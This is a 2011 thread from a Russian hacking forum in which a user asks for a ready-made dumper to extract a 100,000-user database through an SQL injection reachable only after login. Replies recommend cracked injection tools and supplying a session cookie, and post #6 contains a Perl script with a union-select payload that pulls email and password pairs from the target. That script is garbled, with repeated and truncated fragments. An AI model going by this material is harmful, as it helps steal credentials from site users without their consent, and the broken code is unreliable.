HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 26.04.2011, 12:55
durito
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме:
117639

Репутация: 55
Отправить сообщение для durito с помощью ICQ
По умолчанию

вообщем такая штука. стандартная скуль юзается только после прохождения авторизации юзера на сайте. база 100К юзеров, админки нет. единственный вариант тянуть базу через авторизованного юзера.

посмотрел на дамперы что есть у меня, все без авторизации. есть что-то уже готовое, чтобы с кодингом не заморачиваться?
 
Ответить с цитированием

  #2  
Старый 26.04.2011, 13:05
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Toolza от Пашкелы, Havij 1.14 Cracked

Подставляешь в эти программы свои куки, и вперед)
 
Ответить с цитированием

  #3  
Старый 26.04.2011, 22:01
durito
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме:
117639

Репутация: 55
Отправить сообщение для durito с помощью ICQ
По умолчанию

mailbrush c Toolza от Пашкелы черта с два без поллитра не разберешься, а доходчивого мануала по ней я не нашел

Havij 1.14 Cracked при открытии load cookie все время выдает доступ к странице запрешен, какой бы урл не вводил
 
Ответить с цитированием

  #4  
Старый 26.04.2011, 22:07
Stalkerhack
Guest
Сообщений: n/a
Провел на форуме:
725

Репутация: 0
По умолчанию

Держи, подойдет?

http://www.slaed.net/files-view-15-word-%E4%EE%EC%E5%ED.html
 
Ответить с цитированием

  #5  
Старый 27.04.2011, 02:47
shellz[21h]
Постоянный
Регистрация: 20.12.2007
Сообщений: 334
Провел на форуме:
1934122

Репутация: 118
Отправить сообщение для shellz[21h] с помощью ICQ
По умолчанию

Stalkerhack, требуется через инъекцию дампер )

--

http://sqlsus.sourceforge.net/
 
Ответить с цитированием

  #6  
Старый 27.04.2011, 08:37
Stalkerhack
Guest
Сообщений: n/a
Провел на форуме:
725

Репутация: 0
По умолчанию

Сори, тупанул.....через инъекцию? будет вам через инъекцию...xDDDDDDDDDDDDD

[QUOTE="None"]
Данный скрипт не поддерживет поточности. т.к для того что бы использовать поточность в perl его нужно пересобирать вручную:
[QUOTE="None"]
#!/usr/bin/perl
use IO::Socket;
require IO::Socket;
sub mas
{
$tem1 = $_[0];
$const_f = "GET PATH_TO_SCRIPT/?id=-37745+union+all+select+concat(char(60,45,45),email ,0x3a,password,char(60,45,45))+from+db.table+limit +";
$const_l = ",1-- HTTP/1.0\r\nHost: domain.name\r\nUser-Agent: mozzila\r\n\r\n";
$ret_mas = $const_f . $tem1 . $const_l;
return $ret_mas;
}
sub myfunc
{
$temp = $_[0];
$data4 = $temp;
my $sock = IO::Socket::INET->new(PeerAddr => 'SERVER_IP',
PeerPort => 80,
Proto => 'tcp',
Timeout => 600 ) || die "fuck";
$sock->autoflush;
print $sock $data4;
@line = ;
close($sock);
foreach(@line)
{
$iline=$_;
chomp $iline;
if($iline=~m/> dataget.txt");
print (FFF $writeme);
print (FFF "\r\n");
close(FFF);
}
for($i=0;$inew(PeerAddr => 'SERVER_IP',
PeerPort => 80,
Proto => 'tcp',
Timeout => 600 ) || die "fuck";
$sock->autoflush;
print $sock $data4;
@line = ;
close($sock);
foreach(@line)
{
$iline=$_;
chomp $iline;
if($iline=~m/> dataget.txt");
print (FFF $writeme);
print (FFF "\r\n");
close(FFF);
}
for($i=0;$inew(PeerAddr => 'SERVER_IP',
PeerPort => 80,
Proto => 'tcp',
Timeout => 600 ) || die "fuck";
$sock->autoflush;
print $sock $data4;
@line = ;
close($sock);
foreach(@line)
{
$iline=$_;
chomp $iline;
if($iline=~m/> dataget.txt");
print (FFF $writeme);
print (FFF "\r\n");
close(FFF);
}
for($i=0;$inew(PeerAddr => 'SERVER_IP',
PeerPort => 80,
Proto => 'tcp',
Timeout => 600 ) || die "fuck";
$sock->autoflush;
print $sock $data4;
@line = ;
close($sock);
foreach(@line)
{
$iline=$_;
chomp $iline;
if($iline=~m/> dataget.txt");
print (FFF $writeme);
print (FFF "\r\n");
close(FFF);
}
for($i=0;$i
 
Ответить с цитированием

  #7  
Старый 27.04.2011, 12:24
durito
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме:
117639

Репутация: 55
Отправить сообщение для durito с помощью ICQ
По умолчанию

всем спасибо. проблема решена с помощью rsaUnDumper. спасибо автору за помощь.

надо было всего лишь добавить куки активной сессии. к сожалению не каждый mysql-дампер такое позволяет сделать.

понял что просче самому написать свой на php
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ